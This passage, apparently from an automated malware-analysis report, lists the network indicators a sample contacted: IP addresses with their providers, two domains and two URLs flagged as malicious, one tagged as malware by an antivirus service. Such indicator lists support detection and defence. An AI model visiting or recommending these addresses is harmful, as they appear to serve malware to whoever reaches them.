202.187.222.40  unknown  Malaysia  9930  TTNET-MYTIMEdotComBerhadMY  true
107.180.12.39  unknown  United States  26496  AS-26496-GO-DADDY-COM-LLCUS  true
184.66.18.83  unknown  Canada  6327  SHAWCA  true

Contacted Domains

Name IP Active
localaffordableroofer.com 107.180.12.39 true
zenithcampus.com 35.200.206.198 true

Contacted URLs

Name  Malicious  Antivirus Detection  Reputation
https://167.71.148.58:443/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/  true  Avira URL Cloud: safe  unknown
http://zenithcampus.com/l/yQ/  true  Avira URL Cloud: malware  unknown